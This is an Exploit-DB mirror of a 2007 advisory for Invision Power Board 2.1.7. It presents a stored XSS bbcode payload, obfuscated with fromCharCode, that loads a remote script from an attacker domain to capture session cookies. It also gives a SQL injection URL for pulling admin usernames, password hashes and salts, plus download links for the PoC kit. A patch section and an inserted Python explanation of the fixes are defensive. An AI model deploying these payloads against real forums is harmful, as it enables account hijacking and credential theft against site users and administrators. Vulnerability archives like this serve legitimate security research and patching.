exploit-db-mirror/exploits/php/webapps/4841.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25
2018-09-25 05:01:51 +00:00
----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]
INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
----[ NITRO ... ]
This vulnerability had already been found before, but no public "fighting" exploit was
available for it. This PoC consists of several parts: an active XSS generator, a JS file that is
loaded when a page carrying the XSS is visited, a log viewer, and a special component that
pulls the necessary data from the forum's MySQL tables if the intercepted session belonged
to a user with moderator privileges.
----[ ANALYSIS ... ]
XSS.php is one of the most important parts of the IPB 2.1.7 PoC package, as it generates the XSS for
later injection on the forum board. As the reference you must specify the full path to the ya.js
file (in which you have already corrected the path beforehand yourself). Most likely all that
remains is to press the button.
[img]http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromCharCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
style=visibility:hidden =[/snapback].gif[/img]
The injection can be executed only when a session of a user with access to the moderator panel
is available. The "starter" parameter must be cast to a number with the "intval" function.
In case of a successful injection it is possible to enumerate the forum's administrator team:
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*
----[ RECORD ... ]
{
---IP ADDRESS sniffed ip address
---REFERER xssed theme
---COOKIES xssed cookies of forum member
---USER ID xssed user id of forum member
---ADMIN NAME admin username
---ADMIN PASS admin pass hash
---ADMIN SALT admin hash salt
}
----[ PATCH ... ]
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
regex_check_image
LINE
924
REPLACE
if ( preg_match( "/[?&;]/", $url) )
WITH
if ( preg_match( "/[?&;\<\[]/", $url) )
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
post_db_parse_bbcode
LINE
486
REPLACE
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
WITH
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
if ( $row['bbcode_tag'] == 'snapback' )
{
$match[2][$i] = intval( $match[2][$i] );
}
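An added illustration of the two fixes in the PATCH section and of the intval() advice in the ANALYSIS section above. This is Python written for this edit, not code from the advisory or from the IPB code base, and the URLs and bbcode strings it checks are constructed stand-ins. It shows why the original image-URL gate is insufficient (it only refuses '?', '&' and ';', so a URL that smuggles a nested tag and an extra attribute without any of those characters passes), that the patched character class refuses such a URL, and that casting the [snapback] argument to an integer, as the patch does, strips everything after the leading number from a "starter"-style value.

```python
import re

# Character classes from the advisory's PATCH section, as Python regexes.
# Original gate in regex_check_image(): refuse the [img] URL only on ? & ;
VULNERABLE_IMG_URL_PATTERN = re.compile(r"[?&;]")
# Patched gate: additionally refuse < and [ so nested bbcode and HTML cannot
# ride inside the URL.
PATCHED_IMG_URL_PATTERN = re.compile(r"[?&;<\[]")

# Constructed sample inputs (not taken from the PoC package).
PLAIN_URL = "http://example.invalid/cat.gif"
QUERY_URL = "http://example.invalid/cat.gif?x=1"
# Same shape as the advisory's payload: a nested tag and a space-separated
# attribute, but none of ? & ; so the original gate does not fire.
SMUGGLED_URL = "http://example.invalid/[snapback] onerror=x =[/snapback].gif"


def img_url_rejected(url: str, pattern: re.Pattern) -> bool:
    """Mirror of the preg_match() gate: True means the URL is refused."""
    return pattern.search(url) is not None


def php_intval(value: str) -> int:
    """Approximation of PHP's intval() on a string: leading whitespace, an
    optional sign and the leading run of digits are used; anything else
    yields 0. This is the cast the patch applies to the snapback argument.
    """
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


# The bbcode matcher from post_db_parse_bbcode() specialised to the snapback
# tag (Python equivalent of the #...#si PCRE pattern on the page).
SNAPBACK_RE = re.compile(
    r"(\[snapback\])((?!\[/snapback\]).+?)?(\[/snapback\])", re.S | re.I
)


def coerce_snapback_args(text: str) -> str:
    """Apply the patch's second fix: the body of every [snapback]...[/snapback]
    is cast to an integer before it can reach a query builder."""
    return SNAPBACK_RE.sub(
        lambda m: f"{m.group(1)}{php_intval(m.group(2) or '')}{m.group(3)}", text
    )


if __name__ == "__main__":
    for url in (PLAIN_URL, QUERY_URL, SMUGGLED_URL):
        print(
            f"{url!r}: original gate rejects="
            f"{img_url_rejected(url, VULNERABLE_IMG_URL_PATTERN)}, "
            f"patched gate rejects={img_url_rejected(url, PATCHED_IMG_URL_PATTERN)}"
        )
    print(coerce_snapback_args("see [snapback]42[/snapback]"))
    print(coerce_snapback_args("[snapback]1 union select 1/*[/snapback]"))
```

The first fix works by denying characters rather than by parsing the URL, so it is only as good as the character class; the second fix is the stronger one, because a numeric cast on the tag body removes any dependence on what the bbcode layer lets through.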
www.underwater.itdefence.ru/isniff.rar
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4841.rar (2008-isniff.rar)
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
OSVDB: 51280, 51281
# milw0rm.com [2008-01-05]